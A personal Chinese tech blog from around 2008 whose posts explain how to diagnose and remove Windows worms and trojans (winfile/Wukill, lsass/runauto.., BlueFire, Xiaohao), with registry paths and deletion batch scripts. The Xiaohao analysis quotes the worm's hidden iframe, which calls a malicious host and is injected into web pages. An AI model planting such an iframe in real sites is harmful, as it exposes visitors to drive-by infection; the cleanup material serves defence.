关于作者

姓名: 性别:女 出生日期:1982-6-22 地区:陕西-西安 联系电话: QQ:-- 婚否:未婚
用户名:fengrenzhe
笔名:fengrenzhe
地区: 陕西-西安
行业:其他

日历  

快速登录

+ 用户名:
+ 密 码:

在线留言



友情博客列表

访问统计:
文章个数:131
评论个数:145
留言条数:21




Powered by BlogDriver 2.1

点点的家

 

新博客开张啦! 地址:http://fengrenzhe.blogbus.com/ 博客公社的模版实在不好改!所以决定转移了,希望朋友们多多支持!

文章

复制粘贴总出现hello !!!!!!
 今天早上接到了一个电话,说:“不知道怎么滴,今天我用ctrl+c复制,可是粘贴一下全是Hello!”
         究其原因是因为winfile 文件病毒,每月的28号发作,今天刚好是3月28号

        症状:
        1:无法复制和粘贴了,无论复制什么内容粘贴出来都是‘Hello!’
            在文件夹操作下,粘贴和复制键都是灰的,给锁了。 

        2:到安装目录下运行exe文件的话,只要一退出,这个exe文件马上 就自动删除了,比如说:C:\PROGRAME FILES\WINRAR\里面,进入目录双击winrar.exe后,winrar.exe就会消失,随后双击一个rar的文件就提示:THIS FILE HAS BEEN DAMAGE!(盖兹犯了语法 错误,应该是damaged)

         3:目录下多出一个winfile文件夹,删不掉,我的文档下多出许多,像回收站winfile,计算器winfile,记事本winfile,双击这样的文件夹就会提示THIS FILE HAS BEEN DAMAGE!

         4:文件夹下多出一个隐藏的同名文件夹,无法进入同样提示THIS FILE HAS BEEN DAMAGE! 比如说:music文件夹下多了一个music文件夹,删除不了也进不去。

         诊断方法:
         1.检查你的机子上有无多个WINFILE.exe文件(48K)。
 
         2.按“Ctrl+Alt+Del”查看应用程序中有无Winime任务,查看进程中有无KI.exe或Mstray.exe存在(该病毒会自己更名!) 
      
         3.运行MSCONFIG,查看启动项中有无KI.exe或Mstray.exe存在;如果用优化大师的话,还可以看到这个程序的名称是RavTimeXP 

         只要满足以上3条中的一条,可以确定已经中毒!!!
         解决办法:
         1.手工方式:在进程中直接中止KI.exe或Mstray.exe进程,然后搜索硬盘上所有WINFILE.EXE文件,删除!(这样就恢复正常了)最后在MSCONFIG中去掉KI.exe或Mstray.exe启动项!重启机器即可!(这样以后就不会再发病了)

         2.杀毒软件:升级你的杀毒软件到最新版可以直接杀毒!!!
         另一份资料:
        [winfile.exe]
        [病毒名]:I-Worm.Wukill
        [破坏方法]:这个病毒采用文件夹图标,具有很大迷惑性。该病毒运行后,会将自己大量复制到其他目录中。

        一、 病毒首次运行时将显示"This File Has Been Damage!";
        二、 将自己复制到windows目录下并改名为Mstray.exe;
        三、 修改注册表:    
                HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Currentversion\Run
              以达到其自启动的目的;
        四、 枚举磁盘目录,在每个根目录下释放下列文件:
               winfile.exe 病毒主体程序
               comment.htt 利用IE漏洞调用同一个目录下的"winfile.exe",属性为隐藏。 desktop.ini 系统为隐藏。采用web方式浏览文件夹时,系统会调用该文件,该文件调用comment.htt ,从而激活病毒。

        五、 病毒修改注册表,隐藏系统文件、隐藏受系统保护的文件、隐藏已知的扩展名称。这样,用户看不到comment.htt和Desktop.ini, winfile.exe被隐藏后缀明,又是文件夹图标,用户极容易认为是文件夹而点击。同时病毒在当前路径下生成的自身拷贝,名称采用上级目录,或者是当前窗口的标题,增加隐蔽性。

        六、病毒调用Outlook发送携带病毒的信件。
             手工清除:(在没有杀毒软件的情况下) 首先:找到Mstray.exe(注意这个是系统 和隐藏的文件,所以大家应该知道怎 么才能找到它了,在系统文件夹下), 删除掉. 并修改注册表,去掉对应的启动项. 接着:利用的Windows的搜索功能,搜索所有的:

        Winfile.exe,comment.htt, desktop.ini(注意:查看->去掉系 统保护,去掉隐藏) 删除!注意还得清楚不要删错了哦! 有些desktop.ini是windows原有 的文件) 最后:查找硬盘内所以的[*.exe]文件, (注意:如上),你会发现好多的文件夹 图标形式的.exe 文件,删除掉所有 这些文件.一切OK!
本人觉得手工查杀比较麻烦,建议大家使用杀毒软件在安全模式杀毒。

- 作者: fengrenzhe 2008年04月28日, 星期一 08:59  回复(0) |  引用(0) 加入博采

复制粘贴总出现hello !!!!!!
 今天早上接到了一个电话,说:“不知道怎么滴,今天我用ctrl+c复制,可是粘贴一下全是Hello!”
         究其原因是因为winfile 文件病毒,每月的28号发作,今天刚好是3月28号

        症状:
        1:无法复制和粘贴了,无论复制什么内容粘贴出来都是‘Hello!’
            在文件夹操作下,粘贴和复制键都是灰的,给锁了。 

        2:到安装目录下运行exe文件的话,只要一退出,这个exe文件马上 就自动删除了,比如说:C:\PROGRAME FILES\WINRAR\里面,进入目录双击winrar.exe后,winrar.exe就会消失,随后双击一个rar的文件就提示:THIS FILE HAS BEEN DAMAGE!(盖兹犯了语法 错误,应该是damaged)

         3:目录下多出一个winfile文件夹,删不掉,我的文档下多出许多,像回收站winfile,计算器winfile,记事本winfile,双击这样的文件夹就会提示THIS FILE HAS BEEN DAMAGE!

         4:文件夹下多出一个隐藏的同名文件夹,无法进入同样提示THIS FILE HAS BEEN DAMAGE! 比如说:music文件夹下多了一个music文件夹,删除不了也进不去。

         诊断方法:
         1.检查你的机子上有无多个WINFILE.exe文件(48K)。
 
         2.按“Ctrl+Alt+Del”查看应用程序中有无Winime任务,查看进程中有无KI.exe或Mstray.exe存在(该病毒会自己更名!) 
      
         3.运行MSCONFIG,查看启动项中有无KI.exe或Mstray.exe存在;如果用优化大师的话,还可以看到这个程序的名称是RavTimeXP 

         只要满足以上3条中的一条,可以确定已经中毒!!!
         解决办法:
         1.手工方式:在进程中直接中止KI.exe或Mstray.exe进程,然后搜索硬盘上所有WINFILE.EXE文件,删除!(这样就恢复正常了)最后在MSCONFIG中去掉KI.exe或Mstray.exe启动项!重启机器即可!(这样以后就不会再发病了)

         2.杀毒软件:升级你的杀毒软件到最新版可以直接杀毒!!!
         另一份资料:
        [winfile.exe]
        [病毒名]:I-Worm.Wukill
        [破坏方法]:这个病毒采用文件夹图标,具有很大迷惑性。该病毒运行后,会将自己大量复制到其他目录中。

        一、 病毒首次运行时将显示"This File Has Been Damage!";
        二、 将自己复制到windows目录下并改名为Mstray.exe;
        三、 修改注册表:    
                HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Currentversion\Run
              以达到其自启动的目的;
        四、 枚举磁盘目录,在每个根目录下释放下列文件:
               winfile.exe 病毒主体程序
               comment.htt 利用IE漏洞调用同一个目录下的"winfile.exe",属性为隐藏。 desktop.ini 系统为隐藏。采用web方式浏览文件夹时,系统会调用该文件,该文件调用comment.htt ,从而激活病毒。

        五、 病毒修改注册表,隐藏系统文件、隐藏受系统保护的文件、隐藏已知的扩展名称。这样,用户看不到comment.htt和Desktop.ini, winfile.exe被隐藏后缀明,又是文件夹图标,用户极容易认为是文件夹而点击。同时病毒在当前路径下生成的自身拷贝,名称采用上级目录,或者是当前窗口的标题,增加隐蔽性。

        六、病毒调用Outlook发送携带病毒的信件。
             手工清除:(在没有杀毒软件的情况下) 首先:找到Mstray.exe(注意这个是系统 和隐藏的文件,所以大家应该知道怎 么才能找到它了,在系统文件夹下), 删除掉. 并修改注册表,去掉对应的启动项. 接着:利用的Windows的搜索功能,搜索所有的:

        Winfile.exe,comment.htt, desktop.ini(注意:查看->去掉系 统保护,去掉隐藏) 删除!注意还得清楚不要删错了哦! 有些desktop.ini是windows原有 的文件) 最后:查找硬盘内所以的[*.exe]文件, (注意:如上),你会发现好多的文件夹 图标形式的.exe 文件,删除掉所有 这些文件.一切OK!
本人觉得手工查杀比较麻烦,建议大家使用杀毒软件在安全模式杀毒。

- 作者: fengrenzhe 2008年04月28日, 星期一 08:58  回复(0) |  引用(0) 加入博采

磁盘已满,系统无法启动......
遇到两起C区磁盘已满开不了机的现象..........

     解决办法:用WINDOWS引导盘至命令行模式下,在c:\window\system32中会发现有一个EdpPatch.crc的文件,修改时间基本上就是机器坏的时间或前一天,用命令del 删除此文件,计算机方可正常使用。

     研究后发现 c:\window\system32之中的文件:EdpPatch.crc

     在正常情况下它只有几个kb大小,可不知原因何在,突然重启后,最大能变到7GB大小,于是内存显示不足,当我细心查看当天修改的文件,发现这个庞然大物,于是删除,结果计算机倒是能正常的运行了,不过他经常是会又出现突然变大,变大的速率就像原子弹爆炸,现在只有解决办法,不知原因何在,网上也差不出任何线索,不知那位高手能解决我的疑惑........

- 作者: fengrenzhe 2008年03月25日, 星期二 09:37  回复(1) |  引用(0) 加入博采

WINDIWS XP中受限用户user和power user 的区别
摘自xp帮助中关于power user组和user组的说明.

超级用户
Power Users 组主要为运行未经认证的应用程序而提供向后兼容性。分配给该组的默认权限允许该组的成员修改计算机的大部分设置。若必须支持未经验证的应用程序,则最终用户需要成为 Power Users 组的成员。

Power Users 组的成员拥有的权限比 Users 组的成员多,但比 Administrators 组的成员少。超级用户可以执行除了为管理员组保留的任务外的其他任何操作系统任务。默认的 Windows 2000 和 Windows XP Professional 对于 Power Users 的安全设置非常类似于 Windows NT 4.0 中对 Users 的安全设置。由 Windows NT 4.0 中的 Users 运行的任何程序,都可由 Windows 2000 或 Windows XP Professional 中 Power Users 运行。

Power Users 可以:

除了 Windows 2000 或 Windows XP Professional 认证的应用程序外,还可以运行一些旧版应用程序。
安装不修改操作系统文件并且不需要安装系统服务的应用程序。
自定义系统资源,包括打印机、日期/时间、电源选项和其他控制面板资源。
创建和管理本地用户帐户和组。
启动或停止默认情况下不启动的服务。
Power Users 不具有将自己添加到 Administrators 组的权限。Power Users 不能访问 NTFS 卷上的其它用户资料,除非他们获得了这些用户的授权。

警告

在 Windows 2000 或 Windows XP Professional 上运行旧版程序通常要求修改对某些系统设置的访问。默认情况下允许超级用户运行安全性不太严格的程序的权限,可能让超级用户获得其他系统权限,甚至完全的管理权限。因此,部署 Windows 2000 或 Windows XP Professional 认证的程序,以便在不影响程序功能的同时,得到最大的安全性非常重要。经认证的程序在由 Users 组提供的安全配置下正常运行。详细信息,请参阅 Microsoft 网站上的安全页。(http://www.microsoft.com)
由于超级用户可以安装或修改程序,因而以超级用户身份连接到 Internet 时可能引起特洛伊木马程序的攻击或其他安全隐患。

用户
“Users” 组是最安全的组,因为分配给该组的默认权限不允许成员修改操作系统的设置或其他用户资料。

Users 组提供了一个最安全的程序运行环境。在全新安装(非升级安装)的系统的 NTFS 格式的卷上,默认的安全设置被设计为禁止该组的成员危及操作系统的完整性及安装程序。用户不能修改系统注册表设置,操作系统文件或程序文件。用户可以关闭工作站,但不能关闭服务器。Users 可以创建本地组,但只能修改自己创建的本地组。他们可以运行经认证的 Windows 2000 或 Windows XP Professional 程序,这些程序由管理员安装或部署。用户对自己的数据文件 (%userprofile%) 和注册表中有关自己的部分 (HKEY_CURRENT_USER) 具有完全控制权。

然而,用户级别权限通常不允许用户成功地运行旧版应用程序。仅保证 Users 组的成员可运行经认证的 Windows 应用程序。(详细信息,请参阅 Microsoft 网站上的 Windows 认证程序。) (http://msdn.microsoft.com)

要保证 Windows 2000 或 Windows XP Professional 系统的安全,管理员应该:

确保最终用户只属于 Users 组。
部署 Users 组的成员可以成功运行的程序,如经认证的 Windows 2000 或 Windows XP Professional 程序。
用户将无法运行为 Windows 2000 以前版本所编写的大多数 Windows 程序,因为这些应用程序中的大多数都是要么不支持文件系统和注册表安全(Windows 95 和 Windows 98),要么就是默认安全设置不严格(Windows NT)。如果在新安装的 NTFS 系统上运行以前的应用程序有问题,可采取下列措施之一:

安装经 Windows 2000 或 Windows XP Professional 所认证的新版应用程序。
将用户从 Users 组移到 Power Users 组。
降低 Users 组的默认安全权限。这可以用兼容的安全模板完成。

- 作者: fengrenzhe 2008年03月24日, 星期一 16:27  回复(0) |  引用(0) 加入博采

Thumbs.db
thumbs.db是一个用于Microsoft Windows XP 或mac os x缓存Windows Explorer的缩略图的文件. thumbs.db保存在每一个包含图片或照片的目录中.

thumbs.db文件可缓存图像文件的格式包括: jpeg, bmp和gif ,tif , pdf和htm.thumbs.db文件是一个数据库,里面保存了这个目录下所有图像文件的缩略图(格式为jpeg).当以缩略图查看时(展示一幅图片或电影胶片) ,将会生成一个thumbs.db文件.

要想去除他,按下述操作.

   1 .单击开始
   2 .双击控制面板
   3 .双击文件夹选项
   4 .点击查看
   5 .打勾不缓存缩略图
   6 .单击ok

Windows XP Media Center Edition版本,也生成了一个ehthumbs.db举行保存了视频文件预览.

windows vista中,微软取消了thumbs.db文件,而是使用把缩略图数据库" thumbcache_xxxx.db "文件集中保存于\Users\[user name]\AppData\Local\Microsoft\Windows\Explorer

最近电脑突然卡,在文件夹里发现了很多的Thumbs.db
感觉不对,马上用在线杀毒http://www.antidu.cn/board/online/ 查杀
没查到毒,放心了。然后找到了它的资料

Thumbs.db是 Windows XP/2003 为了提高文件夹在缩略图查看方式下的响应速度而对当前文件夹下的图像文件建立的缓存,这个文件本身并无大碍,因为本身是“系统文件+隐藏文件”,平常是不显示的(除非你电脑的查看里设置了)。但有时却挺麻烦的,甚至能给 Web 站点带来一定的安全风险。
比如当你上传电脑的数码相片,在查看时,删除了其中的一张“SSA2501”,再将其后的“SSA2502”改成了“SSA2501”,看,“SSA2502”的照片立刻换成了“SSA2501”的照片,不只是名字换了,照片也变了。如果再将“SSA2503”的名字重命名成“SSA2502”,奇迹发生了,原来的“SSA2502”照片又回来了,“SSA2503”的照片不见了!
是中毒了吗?不是的!!原来Windows XP为了能更快地显示图片,会自动将文件夹中的图片缩略图保存为索引文件“Thumbs.db”。我们将没用的图片删除后,由于“Thumbs.db”不能立即自动更新,当出现新文件与原文件名称相同时,便直接将原缩略图取了出来,其实图片本身并没变,改变的只是图片的缩略图。但这样就对用户造成了误导!
更严重的后果是如果一位 Web 站点创作者在 Windows 文件夹选项中设置显示系统文件和隐藏文件,他在制作网站的过程中制作或搜集了大量图片到某一目录,并以缩略图的方式预览过此目录,然后他在上传整个目录或所有文件到服务器的时候,就无意中把这个 Thumbs.db 也给传了上去,因为有工具可以查看 Thumbs.db 的内容,甚至导出其中的图像,这样一来,就开启了此目录的浏览权限。用户可以通过 Thumbs.db 得到此文件夹中的所有文件名及缩略内容,然后可以使用Thumbs.db 浏览器下载此目录下的所有图像文件并浏览,最坏的情况是让别人发现这缩略图中还有不健康内容 ...
禁用方法是:打开“我的文档”,选择“工具→文件夹选项→查看”,选中“不缓存缩略图”选项前的复选框,即可禁止Windows XP使用Thumbs.db文件缓存缩略图。(如下图所示)。
删除方法是:利用搜索功能把所有Thumbs.db文件找出来并删除。或者生成一个.bat文件,运行之后,一切问题都将迎刃而解。
生成.bat文件方法如下:新建一个文本文档,并将其另存为DelThumbs.bat文件即可。
FOR %%I IN (C:D:E:F:G:H:I:) DO (%%I cd\\ attrib -s -h -r Thumbs.db /s /d >nul del Thumbs.db /s)
保存完毕直接运行即可将硬盘中的所有Thumdb文件全部删除!

- 作者: fengrenzhe 2008年03月12日, 星期三 15:56  回复(0) |  引用(0) 加入博采

转载:runauto..文件夹删除方法
下面说一下感染特征,首先请先设置显示所有文件。
(“我的电脑”,“工具”,“文件夹选项”,“查看”选项卡:勾选 “显示系统文件夹的内容”,取消“隐藏受保护的操作系统文件”,取消“隐藏已知文件类型的扩展名”,选择“显示所有文件和文件夹”,基于安全理由,我强烈建议大家使用此作为以后的长期设置,便于发现病毒和识别危险文件。)

1.在各个分区根目录下面出现名为“runauto..”的文件夹,“autorun.inf”或“autorun.inf.tmp”的文件。
2.在C:\WINDOWS\下面出现lsass.exe,cmd.exe.exe,regedit.exe.exe,setuprs1.pif文件。
3.打开任务管理器会发现有两个名为lsass.exe的进程。
4.在我的电脑里面打开每一个分区都是以新窗口打开的。
5.MMC控制台打开以后很短时间内会自动关闭。
6.U盘或移动硬盘出现无法打开的问题。(会出现一个打开方式的窗口)

基本上前3点都很明显了,后面3点也是系统异常,正常的lsass.exe是系统进程,并且只会同时运行一个,正确的路径是C:\WINDOWS\SYSTEM32\lsass.exe。

以下部分内容参考网上的信息,另结合个人总结
********************木马隐藏的所有地方******************
一,注册表项
1.HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
查看cmd.exe,msconfig.exe,regedit.exe,regedt32.exe等项,建议把该树下的每一个项目都仔细查看,发现值为"setuprs1.pif"或"xxx.pif"的都删掉,同时搜索硬盘内对应的"xxx.pif"文件。

2.HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\kkdc

3.HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
中的"C:\\WINDOWS\\lsass.exe"="C:\\WINDOWS\\lsass.exe:*:Enabled:lsass.exe"

4.HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\kkdc

5.HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
中的"C:\\WINDOWS\\lsass.exe"="C:\\WINDOWS\\lsass.exe:*:Enabled:lsass.exe"

建议在注册表编辑器中搜索"lsass.exe"发现路径不是"C:\WINDOWS\SYSTEM32\lsass.exe"的都要删掉。

二,文件和文件夹
1.各个分区根目录下面的"runauto.."文件夹,其真正的文件夹名为"runauto...\",删除使用如下命令:
RMDIR C:\runauto...\ /S /Q

2.各个分区根目录下面的"autorun.inf"或"autorun.inf.tmp"文件,建议使用如下命令删除:
DEL C:\autorun.* /F /Q /A R H S A

3.Windows目录下面的lsass.exe,cmd.exe.exe,regedit.exe.exe,setuprs1.pif和其他图标为透明的exe文件例如r.exe
删除命令:
DEL C:\WINDOWS\lsass.exe /F /Q /A R H S A
DEL C:\WINDOWS\setuprs1.pif /F /Q /A R H S A
DEL C:\WINDOWS\cmd.exe.exe /F /Q /A R H S A
DEL C:\WINDOWS\regedit.exe.exe /F /Q /A R H S A
DEL C:\WINDOWS\r.exe /F /Q /A R H S A

********************手工清杀方法******************
知道了木马隐藏的地方,对照着自己清理就行了,不过该木马使用了很多保护自己的方法,可能会面对无法删除文件或无法删除有关注册表项的问题,导致无法杀绝,然后该木马又自动重生,下面结合自己的个人经验说一下有关问题的解决。

1.无法删除lsass.exe文件,基本上所有文件里面就这个文件比较难以删除,原因是该进程正在运行,而任务管理器无法中止该任务,而且如果该进程不杀掉的话所有工作会白费,木马会重新建立。
解决方法:

1) 通过NET STOP "Kerberos Key Distribution Centers"中止木马进程,可以直接在运行里面运行,也可以在命令行里面运行。注意由于该木马自动关联了cmd.exe,regedit.exe等有关工具,所以在使用这些工具的时候先把有关文件copy出来,改成其他文件再运行,如regedit.exe copy 成123.exe,文件本身是没有被修改的,但是由于注册表中的关联,所以在执行这些文件的时候会自动执行木马进程,所以要先改名再运行。把进程关掉,然后删掉所有文件,再使用改过名的注册表编辑器打开注册表,删掉有关键值,重启即可。

2)下载进程终结工具终结该进程。3)启动到DOS模式删除有关所有文件,只要能把所有木马的文件删掉,即使注册表还未清理,但是因为木马本身已被杀掉了,所以是不起作用的,重启以后进windows清理注册表即可。

2.无法删除"runauto.."文件夹。
解决方法:该文件夹真正的名称为"runauto...\" 执行RMDIR C:\runauto...\ /S /Q即可删除。

3.我写了一个专门的批处理命令行来删除所有的文件:

--------------------命令行工具开始--------------------
@echo off
echo "先中止病毒进程"
NET STOP "Kerberos Key Distribution Centers"

echo "删除C盘病毒文件"
DEL C:\WINDOWS\lsass.exe /F /Q /A R H S A
DEL C:\WINDOWS\setuprs1.pif /F /Q /A R H S A
DEL C:\WINDOWS\cmd.exe.exe /F /Q /A R H S A
DEL C:\WINDOWS\regedit.exe.exe /F /Q /A R H S A
DEL C:\WINDOWS\r.exe /F /Q /A R H S A

echo "删除各个分区根目录下文件,需要根据各个电脑的分区数量进行调整"
RMDIR C:\runauto...\ /S /Q
DEL C:\autorun.* /F /Q /A R H S A
RMDIR D:\runauto...\ /S /Q
DEL D:\autorun.* /F /Q /A R H S A
RMDIR E:\runauto...\ /S /Q
DEL E:\autorun.* /F /Q /A R H S A
RMDIR F:\runauto...\ /S /Q
DEL F:\autorun.* /F /Q /A R H S A
RMDIR G:\runauto...\ /S /Q
DEL G:\autorun.* /F /Q /A R H S A

COPY C:\WINDOWS\regedit.exe C:\WINDOWS\ghregedi.exe
echo "注册表编辑器已备份为ghregedi.exe"

COPY C:\WINDOWS\SYSTEM32\cmd.exe C:\WINDOWS\SYSTEM32\ghcmd.exe
echo "命令行工具已备份为ghcmd.exe"

echo "文件删除完毕,请重新启动并清理注册表相关项。"

pause

--------------------命令行工具结束--------------------

新建一个记事本文档,把分割线之间的内容复制进去(不包括分割线),另存为123.bat然后执行即可。

4.如果你的电脑找不到cmd.exe或regedit.exe,我这里提供了一个。
图片点击可在新窗口打开查看点击浏览该文件

--------------------最后的分割线--------------------
最后,注明一行参考的资料,其实都是参考前人的一些经验,感谢各位达人的贡献。

http://ks.cn.yahoo.com/question/?qid=1407040504076&source=ysearch_ks_question_ask

http://aqqle.blog.com.cn/archives/2007/delrunauto.shtml

U盘病毒通过autorun.inf文件传播.病毒创建一个autorun.inf,当你在插入U盘或者双击u盘时,autorun.inf中的设置会运行u盘中的病毒.只要可以阻止autorun.inf文件的创建,那么U盘就算中毒也不能发作.有个方法.在根目录下,删除autorun.inf文件.然后,根目下建立一个文件夹,名字就叫autorun.inf。这样一来,因为在同一目录下,同名的文件和文件夹不能共存的原理,在autorun.inf文件夹里面创建一个带.的文件夹,使得病毒无法删除autorun.inf文件夹,病毒就无能为力,创建不了autorun.inf文件了.以后就算中毒,病毒也不会运行.

在批处理里可加多几句:

c:
cd\
md autorun.inf

其他盘的也一样.

另外大家用百度或Google搜索一下"runauto.."也可以找到很多相关内容以及专杀工具。因为我也试过一些专杀工具但是或者无用或者不彻底,建议有能力的人还是手工查杀比较可靠,据说这个东西叫灰鸽子2007,我也是通过搜索知道的。

这个东西是通过U盘或移动硬盘传播的,并且几乎可以100%感染,建议大家都关闭自动运行功能,以后大家用U盘的时候就要注意一下,有写保护功能的都开着吧,打印店是万毒之源。。。

- 作者: fengrenzhe 2008年03月12日, 星期三 14:50  回复(0) |  引用(0) 加入博采

bluefire.exe
木马蓝色火焰
全名是:Trojan.BlueFire.B
Trojan.BlueFire.B是一个黑客程序,运行后复制两份放在系统目录(如:c:\windows\system)下, 名为tasksvc.exe和sysexpl.exe,并在注册表的HKEY_LOCAL_MACHINE\Software\Microsoft\windows\CurrentVersion\run键值添加一项指向tasksvc.exe文件,使系统启动时, 黑客程序自运行。改动HKEY_CLASSES_ROOT\txtfile\shell\open\command默认值为sysexpl.exe, 使每次打开txt文件时自动运行.

此类木马为dll类型木马,因此我在安全模式下删除了windows/system32/下的
fbhook.dll,但一开机该死的fbhook.dll又出现了,因此可以得出,它肯定在注册表中做
了手脚,打开注册表Regedit 点击目录至:
: HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run
发现有“C:\\windows\\system32\\ tasksvc.exe”
将之删除,再删除C:\\windows\\system32\\ tasksvc.exe
到安全模式下将windows/system32/下的fbhook.dll删除.

右击任意一个文本文件,发现在打开方式中出现了一个win32 network interface service process方式,在注册表中查找之,发现它还指向一个windows\\system32\\sysexpl.EXE
将之删除。

- 作者: fengrenzhe 2008年03月12日, 星期三 14:27  回复(0) |  引用(0) 加入博采

双击盘符变搜索
分区(硬盘)或文件夹无法双击打开的处理方法
最近经常有朋友在论坛询问如下情况的处理方法

1、双击分区无法打开(或双击后出来搜索,或提示Could not load the dynamic link library PSAPI.DLL)
2、双击文件夹无法打开

虽然有的可用鼠标右键,选择“打开”用以打开分区或文件夹,但对使用带来诸多不方便,现写出一般处理方法。

1、如果各分区下带autorun.inf一类的隐藏文件,删除后最好重新启动电脑。

2、在文件类型中重新设置打开方式(以XP为例)
打开 我的电脑--工具--文件夹选项--文件类型,找到“驱动器”或“文件夹”(具体选哪个根据你所遇问题,若属于双击打不开驱动器则选择“驱动器”,打不开文件夹则选择“文件夹”)。点下方的“高级”,在“编辑文件类型”对话框里的“新建”,操作里填写“open”(这个可随意填写,如果有“open”且指向的是其他陌生的.exe文件则有可能指向的是木马,则选择“编辑”),用于执行操作的应用程序里填写explorer.exe,确定。随后返回到“编辑文件类型”窗口,选中“open”,设为默认值,确定。现在再打开分区或文件夹看下,是不是已恢复正常?

3、注册表法:
a、对于分区不能双击打开者
开始--运行--输入regedit,找到[HKEY_CLASSES_ROOT\Drive\shell]将shell下的全部删除,然后关闭注册表,按键盘F5刷新,双击分区再看。
b、对于文件夹不能双击打开者
开始--运行--输入regedit,找到[HKEY_CLASSES_ROOT\Directory\shell]将shell下的全部删除,然后关闭注册表,按键盘F5刷新,双击分区再看。

- 作者: fengrenzhe 2007年09月10日, 星期一 10:25  回复(0) |  引用(0) 加入博采

全面清扫lsass木马
LSASS进程介绍

进程文件: lsass 或者 lsass.exe
进程名称: Local Security Authority Service

进程名称: lsass.exe是一个系统进程,用于微软Windows系统的安全机制。它用于本地安全和登陆策略。注意:lsass.exe也有可能是Windang.worm、irc.ratsou.b、Webus.B、MyDoom.L、Randex.AR、Nimos.worm创建的,病毒通过软盘、群发邮件和P2P文件共享进行传播。


出品者: Microsoft Corp.


属于: Microsoft Windows Operating System

如果你的启动菜单里有个lsass.exe启动项,那就证明你得lsass.exe木马病毒,中毒后,在进程里可以见到有两个相同的进程,分别是lsass.exe和LSASS.EXE,同时在windows下生成LSASS.EXE和exert.exe两个可执行文件,且在后台运行,LSASS.EXE管理exe类执行文件,exert.exe管理程序退出,还会在D盘根目录下产生command.com和autorun.inf两个文件,同时侵入注册表破坏系统文件关联。

清除lsass木马网友解决方案(很管用):

这个木马我都不屑于用战斗二字,因为在我看来,所有的用autorun传染可移动磁盘的木马都是那么的卑鄙无耻。我从来不和卑鄙无耻的事物战斗。

我在网上找了清理方法。不过各有不足,根据亲身经历,完善一下

首先,你会在各个分区发现autorun.inf文件和runauto..文件夹,当然都是隐藏,好在可以在文件夹选项中把隐藏文件显示出来。

先把autorun.inf(或者有的是带着pf扩展名的,都删)删了,最好用winrar打开根目录,或右键选打开,选小字体的那个打开,不要用双击,

接下来结束lsass.exe这个进程,有两个,用超级兔子或安全360看一下,要结束的是目标在c:\windows目录下那一个,不是system32下那一个。

结束了又出来?别急,打开控制面板,找到计算机管理,服务,找到Kerberos Key Distribution Centers 服务并停止它。查看进程确保进程列表中只有一个lsass.exe路径为c:\windows\system32。

在C(系统盘):\windows中找到"regedit.exe",改名为"regedit.com",双击运行(不要直接到运行下输入regedit去运行,因为病毒已经用文件把系统的regedit替代了)

在注册表中清除如下健值:[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\]中的cmd.exe、msconfig.exe、regedit.exe、regedt32.exe项。

[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\]中的kkdc项

[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001
\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications \List]中的"C:\\WINDOWS\\lsass.exe"="C:\\WINDOWS\\lsass.exe:*:Enabled: lsass.exe"

查看[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\]中是否存在kkdc项,如存在删除kkdc项。

查看[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\ Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List]中是 否有
"C:\\WINDOWS\\lsass.exe"="C:\\WINDOWS\\lsass.exe:*:Enabled:lsass.exe", 如有则删除"C:\\WINDOWS\\lsass.exe"="C:\\WINDOWS\\lsass.exe:*:Enabled: lsass.exe"。

再查看一下[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002下与上述类似的地方,有没有跟上述一样的项目,有的话删除

关闭注册表编辑器,刷新,将"regedit.com"改回"regedit.exe"(通常发现又新出现了一个regedit.exe,那个是系统自动生成的,这样就把这个regedit.com删除就行了),完成。

在C:\windows目录中找到lsass.exe、regedit.exe.exe、cmd.exe.exe、setuprs1.pif以及有病毒生成的文件这些文件有个特征是“没有图标”的后缀名为.exe的文件。(这些文件是由于在中毒后运行cmd.exe、regedit.exe、 regedit32.exe、maconfig.exe时生成的文件,文件名一般为r.exe、r0.exe等。)

好了,接着在开始菜单运行cmd,要删除各个分区,别忘了还有优盘里的runauto..这个删不了的垃圾:

在命令行界面进入各个分区根目录运行

rmdir RUNAUT~1 /s /p
或者
rd /s/q runauto...\


如果别的磁盘也有runauto..隐藏文件夹和autorun.inf两个存在则在cmd 下进入相应盘符执行同样操作即可。
注:autorun.inf文件一般只存在于C盘和移动磁盘里,而runauto..隐藏文件夹则是每个磁盘下都会有。

确定删除完毕后重新启动机器即可。

- 作者: fengrenzhe 2007年09月6日, 星期四 13:09  回复(0) |  引用(0) 加入博采

转:小浩蠕虫(xiaohao.exe)分析与解决方案_续

   6、全盘搜索扩展名为*.jsp、*.php、 *.aspx、 *.asp、 *.html、 *.htm的文件,向其中插入病毒网址。
               <iframe src=http://xiaohao.yona.biz/*.htm width=0 height=0></iframe>
               其中该恶意页面利用多个系统漏洞针对Windows 2000/XP/2003进行有针对性的挂马。


          7、其它行为:
               修改注册表使系统无法正常浏览隐藏文件,修改注册表劫持正常的EXE运行,使得运行一些文件会先运行蠕虫自身:
               HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\ CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWAL
             shell\Auto\command=Xiaohao.exe
               shellexecute=Xiaohao.exe
               open=Xiaohao.exe
            当用户打开感染的文件夹时,资源管理器标题会被修改成:已中毒 X14o-H4o's Virus

四、解决方案
          1、超级巡警已经紧急升级,请广大用户升级到最新特征库来预防病毒。
